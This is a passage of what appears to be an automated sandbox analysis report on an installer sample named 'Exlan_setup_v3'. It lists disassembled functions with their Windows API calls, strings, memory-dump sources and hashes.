Instruction Fuzzy Hash: 1E51D7B23051449BD724CE5EDA80B9FB7A6DBC9314B24862DE855D7B84DBB0EC408791

Function 6CFBAA00 Relevance: 12.3, APIs: 8, Instructions: 309COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CFBAA54
VariantInit.OLEAUT32(?), ref: 6CFBAA5B
VariantInit.OLEAUT32(?), ref: 6CFBAA62
VariantInit.OLEAUT32(?), ref: 6CFBAA69
VariantClear.OLEAUT32(?), ref: 6CFBACF2
VariantClear.OLEAUT32(?), ref: 6CFBACF9
VariantClear.OLEAUT32(?), ref: 6CFBAD00
VariantClear.OLEAUT32(?), ref: 6CFBAD07

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: df0c6c232a39e2d196d83eed154f7c13f7670d0cc6fa65069a0c2900c8be0146
Instruction ID: 7035dcda42da7cfe8789ec638a227074fdafb33291e943299cc40c718b4830e9
Opcode Fuzzy Hash: df0c6c232a39e2d196d83eed154f7c13f7670d0cc6fa65069a0c2900c8be0146
Instruction Fuzzy Hash: 97C137B16087019FC300DF69C880A5BB7E6FFC9704F248A4DE5A8AB265D731E845CB92

Function 6CFB9D00 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CFB9DEB
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CFB9DFB
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CFB9E29
SafeArrayDestroy.OLEAUT32(?), ref: 6CFB9F25
VariantClear.OLEAUT32(?), ref: 6CFB9FE5

Strings

@, xrefs: 6CFB9DD7

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ArraySafe$Bound$ClearDestroyElementVariant
String ID: @
API String ID: 3214203402-2766056989
Opcode ID: 944c4b8355fc79c5dae3e4444f5ff3f55f1cb892afd3e2abbf3cc0243c373e94
Instruction ID: afee88f78cf4c0a72db70138fc6a2d6051e43a804475c2a20f2a6e9d520dccad
Opcode Fuzzy Hash: 944c4b8355fc79c5dae3e4444f5ff3f55f1cb892afd3e2abbf3cc0243c373e94
Instruction Fuzzy Hash: 7AD17971D01249CFDB00CFAAC880A9DBBB6FF98318F64816DE515AB754DB31AA45CB90

Function 6D0144E9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6D014532
DName::operator+.LIBCMT ref: 6D014539
DName::DName.LIBCMT ref: 6D01455B
DName::operator+.LIBCMT ref: 6D014562
DName::operator+.LIBCMT ref: 6D014569

Strings

throw(, xrefs: 6D01452A, 6D014553

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: 65039234cce698f72cc55466ffe845366b1f593494f55c9b4e06657fb33a6ea4
Instruction ID: c12e731d3de098e924dc6fcd80a9f7b9674da3594cea14f1114eab7f30f90ad2
Opcode Fuzzy Hash: 65039234cce698f72cc55466ffe845366b1f593494f55c9b4e06657fb33a6ea4
Instruction Fuzzy Hash: 84019274608109BFEF04DBE4CC91FFD7BB9EB48348F418055E6019B2A1EB30D9468790

Function 6D00E9B9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6D039880,00000008,6D00EAC1,00000000,00000000,?,?,6D00D7DD,6D009DEF,00000000,?,6D009BD4,6CFA1290,5A45ABCE), ref: 6D00E9CA
__lock.LIBCMT ref: 6D00E9FE

Part of subcall function 6D012438: __mtinitlocknum.LIBCMT ref: 6D01244E
Part of subcall function 6D012438: __amsg_exit.LIBCMT ref: 6D01245A
Part of subcall function 6D012438: EnterCriticalSection.KERNEL32(6D009BD4,6D009BD4,?,6D00EA03,0000000D), ref: 6D012462

InterlockedIncrement.KERNEL32(FFFFFEF5), ref: 6D00EA0B
__lock.LIBCMT ref: 6D00EA1F
___addlocaleref.LIBCMT ref: 6D00EA3D

Strings

KERNEL32.DLL, xrefs: 6D00E9C5

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: bddc7736305e7412e301ab5cf7a7a7224a45df620854a1b0db8e93011c9b84be
Instruction ID: 0c73d569e554c829794e65632e239f60e20be5e5c3cd6d508910b6121897e2d6
Opcode Fuzzy Hash: bddc7736305e7412e301ab5cf7a7a7224a45df620854a1b0db8e93011c9b84be
Instruction Fuzzy Hash: E2018B71449B00EFF7209F69D804749BBF0BF46329F20890ED69A932A0CBB0A640CB21

Function 6CFBE120 Relevance: 9.4, APIs: 6, Instructions: 364COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6CFBE29B
SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6CFBE2B6
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CFBE2D7

Part of subcall function 6CFC5760: std::tr1::_Xweak.LIBCPMT ref: 6CFC5769

SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CFBE309

Part of subcall function 6D009BB5: _malloc.LIBCMT ref: 6D009BCF

SafeArrayDestroy.OLEAUT32(00000000), ref: 6CFBE523
InterlockedCompareExchange.KERNEL32(6D04C6A4,45524548,4B4F4F4C), ref: 6CFBE544

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
String ID:
API String ID: 2722669376-0
Opcode ID: f74799b80ac067ad9717b09c0758732bdc1a688294c8fc123d305d4b6845a140
Instruction ID: 6ad5dd79735e54130878ad7b711264e20ffec06a98608b64d20244f597df8cab
Opcode Fuzzy Hash: f74799b80ac067ad9717b09c0758732bdc1a688294c8fc123d305d4b6845a140
Instruction Fuzzy Hash: 4BD1D2B1A002059FEB10CFA5C884B9EB7B8AF45308F1985A9E905FB781D775ED44CBA1

Function 6CFB7370 Relevance: 9.1, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 6D009BB5: _malloc.LIBCMT ref: 6D009BCF

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,6D0211FD,000000FF,?,6CFB8B80,00000000,?,00000000,?,6CFB8C13,?,?), ref: 6CFB7415
InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000,6D0211FD,000000FF,?,6CFB8B80,00000000,?,00000000,?,6CFB8C13,?,?), ref: 6CFB741B
std::exception::exception.LIBCMT ref: 6CFB743D
__CxxThrowException@8.LIBCMT ref: 6CFB7452
std::exception::exception.LIBCMT ref: 6CFB7461
__CxxThrowException@8.LIBCMT ref: 6CFB7476

Part of subcall function 6D009BB5: std::exception::exception.LIBCMT ref: 6D009C04
Part of subcall function 6D009BB5: std::exception::exception.LIBCMT ref: 6D009C1E
Part of subcall function 6D009BB5: __CxxThrowException@8.LIBCMT ref: 6D009C2F

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$CriticalInitializeSection$_malloc
String ID:
API String ID: 189561132-0
Opcode ID: 7f495ddee903388c0672e54bd439cce0ae6177b9a6af720a72dda036f877ef3f
Instruction ID: f99e7290716d2e48d20f0d18466b2ebdacc984b5e7810e6c8013e947bacd52e0
Opcode Fuzzy Hash: 7f495ddee903388c0672e54bd439cce0ae6177b9a6af720a72dda036f877ef3f
Instruction Fuzzy Hash: 774199B2904648AFD710CF59D880AAAFBF8FB58310F45856AE91A97B40D731F904CBA1

Function 6CFCC150 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CFCC180
SafeArrayPutElement.OLEAUT32(00000000,6CFC3749,?), ref: 6CFCC1B8
VariantClear.OLEAUT32(?), ref: 6CFCC1C4
VariantCopy.OLEAUT32(6CFC3749,?), ref: 6CFCC21B
VariantClear.OLEAUT32(?), ref: 6CFCC22F
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CFCC23E

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ArraySafeVariant$Clear$CopyCreateDestroyElementVector
String ID:
API String ID: 3979206172-0
Opcode ID: f9fe1cb1a81db9328094c55346b14da0cbb4fb4cca28828b1dc2349051854c16
Instruction ID: 8c32933e3b8c09a66e98b5405080978546f65154bfebb5803a9a102ab4fdf68c
Opcode Fuzzy Hash: f9fe1cb1a81db9328094c55346b14da0cbb4fb4cca28828b1dc2349051854c16
Instruction Fuzzy Hash: 1A313975A0520AAFDB00DFA9C895B9FBBB8EF99304F108569E915D7350EB30E901CB60

Function 6D01249C Relevance: 9.1, APIs: 6, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000100,?,?,?,?,?,6D0125B1,?,00000000,?), ref: 6D0124E6
_malloc.LIBCMT ref: 6D01251B
_memset.LIBCMT ref: 6D01253B
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000,00000001,00000000), ref: 6D012550
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6D01255E
__freea.LIBCMT ref: 6D012568

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ByteCharMultiWide$StringType__freea_malloc_memset
String ID:
API String ID: 525495869-0
Opcode ID: 6068b8e79250b27bfd08aac24d9b5acef91009acb99700ed1f99cc3cbbbe448b
Instruction ID: 58681cf762136c8488d66de7c84aa89012bef1322c1eb09fddc9bca677cca788
Opcode Fuzzy Hash: 6068b8e79250b27bfd08aac24d9b5acef91009acb99700ed1f99cc3cbbbe448b
Instruction Fuzzy Hash: 90318CB160420AEFFB11CFA8DCD1EAE7BE9EB0A358F114425F91497250E730D9608B60

Function 6CFA4D90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CFA4DA9

Part of subcall function 6D009125: std::exception::exception.LIBCMT ref: 6D00913A
Part of subcall function 6D009125: __CxxThrowException@8.LIBCMT ref: 6D00914F
Part of subcall function 6D009125: std::exception::exception.LIBCMT ref: 6D009160

std::_Xinvalid_argument.LIBCPMT ref: 6CFA4DCA
std::_Xinvalid_argument.LIBCPMT ref: 6CFA4DE5

Strings

invalid string position, xrefs: 6CFA4DA4
string too long, xrefs: 6CFA4DC5, 6CFA4DE0

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw
String ID: invalid string position$string too long
API String ID: 4225265588-4289949731
Opcode ID: 454a1449744c0f148d588aaac944abd981f1ff4b121900630d20b005cfb3124f
Instruction ID: 56a0776816ba542f96fa5fe57cdf98bc1fe439524a1b6c0b2bfe19b9e5ac363f
Opcode Fuzzy Hash: 454a1449744c0f148d588aaac944abd981f1ff4b121900630d20b005cfb3124f
Instruction Fuzzy Hash: F931F932304200DFE724CFACE8C0BAAFBE9AF90364B20462EE551CBA41CB71D841C391

Function 6CFC3C10 Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

SafeArrayGetElement.OLEAUT32(?,?,5A45ABCE), ref: 6CFC3C49
VariantInit.OLEAUT32(?), ref: 6CFC3C81
VariantClear.OLEAUT32(?), ref: 6CFC3D26
VariantClear.OLEAUT32(?), ref: 6CFC3D30
VariantClear.OLEAUT32(?), ref: 6CFC3D89

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$Clear$ArrayElementInitSafe
String ID:
API String ID: 4110538090-0
Opcode ID: 54a49ddd64d33d2d3a16fd0c0cb2daf6480cfa307e8aeb0627b962cbd0bd5305
Instruction ID: 02fa6ee64ff928562065b9298e63a2e9373b48dc0a0643c5d24aae2a6a42bbe8
Opcode Fuzzy Hash: 54a49ddd64d33d2d3a16fd0c0cb2daf6480cfa307e8aeb0627b962cbd0bd5305
Instruction Fuzzy Hash: 73617D76B01249DFCB00DFA8C880AEEB7B5FF49314F248599E515A7350C731AD49CBA1

Function 6CFB6D40 Relevance: 7.6, APIs: 5, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 6D009BB5: _malloc.LIBCMT ref: 6D009BCF

_rand.LIBCMT ref: 6CFB6DEA

Part of subcall function 6D009E0C: __getptd.LIBCMT ref: 6D009E0C

std::exception::exception.LIBCMT ref: 6CFB6E17
__CxxThrowException@8.LIBCMT ref: 6CFB6E2C
std::exception::exception.LIBCMT ref: 6CFB6E3B
__CxxThrowException@8.LIBCMT ref: 6CFB6E50

Part of subcall function 6D009BB5: std::exception::exception.LIBCMT ref: 6D009C04
Part of subcall function 6D009BB5: std::exception::exception.LIBCMT ref: 6D009C1E
Part of subcall function 6D009BB5: __CxxThrowException@8.LIBCMT ref: 6D009C2F

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$__getptd_malloc_rand
String ID:
API String ID: 2791304714-0
Opcode ID: 7e6cdc7477cdb80be88ff0a3b6355aa0abd376616eb1934e9701943115d40af4
Instruction ID: 9fe66c35bb89f3f94696a76db99331910b9965ee1615511b2500f4edb802ae1d
Opcode Fuzzy Hash: 7e6cdc7477cdb80be88ff0a3b6355aa0abd376616eb1934e9701943115d40af4
Instruction Fuzzy Hash: 945168B1904604AFE710CF59D880B9AFBF4FB08314F448A6EE85A97B41D775EA04CBA0

Function 6CFB7750 Relevance: 7.6, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6CFB7761
LeaveCriticalSection.KERNEL32(00000000,?), ref: 6CFB7782
EnterCriticalSection.KERNEL32(00000018), ref: 6CFB7796
LeaveCriticalSection.KERNEL32(00000018), ref: 6CFB77CE
QueueUserWorkItem.KERNEL32(6CFD1D50,00000000,00000010), ref: 6CFB780C

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ItemQueueUserWork
String ID:
API String ID: 584243675-0
Opcode ID: ddf393c91fa35a72f96415be84d694384b81d416c0a0842d33fec029d5665565
Instruction ID: e202ee03048f9cfc871fd55dbb7ca7266d868624042a7456d980f9972972e06b
Opcode Fuzzy Hash: ddf393c91fa35a72f96415be84d694384b81d416c0a0842d33fec029d5665565
Instruction Fuzzy Hash: 8F21B072502208AFDB00CF65D984F9FBBF8FF55304F20895AE456A7A40D730E648CBA0

Function 6D00F03B Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6D00F047

Part of subcall function 6D00EAE6: __getptd_noexit.LIBCMT ref: 6D00EAE9
Part of subcall function 6D00EAE6: __amsg_exit.LIBCMT ref: 6D00EAF6

__amsg_exit.LIBCMT ref: 6D00F067
__lock.LIBCMT ref: 6D00F077
InterlockedDecrement.KERNEL32(?), ref: 6D00F094
InterlockedIncrement.KERNEL32(05851658), ref: 6D00F0BF

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 336cdbe2758452936db724d5a4da5e50db9485922a4966d412730719e2300982
Instruction ID: e49719fecbe25b965df5f1f2091fb86feb688d89b15cfdc936122bffd838b8e0
Opcode Fuzzy Hash: 336cdbe2758452936db724d5a4da5e50db9485922a4966d412730719e2300982
Instruction Fuzzy Hash: 4401F931D09722FBFB11AF64C500B6E7BB8BF05714F028005D910A3680CB34A891DBE6

Function 6D00F7BC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6D00F7C8

Part of subcall function 6D00EAE6: __getptd_noexit.LIBCMT ref: 6D00EAE9
Part of subcall function 6D00EAE6: __amsg_exit.LIBCMT ref: 6D00EAF6

__getptd.LIBCMT ref: 6D00F7DF
__amsg_exit.LIBCMT ref: 6D00F7ED
__lock.LIBCMT ref: 6D00F7FD
__updatetlocinfoEx_nolock.LIBCMT ref: 6D00F811

Memory Dump Source

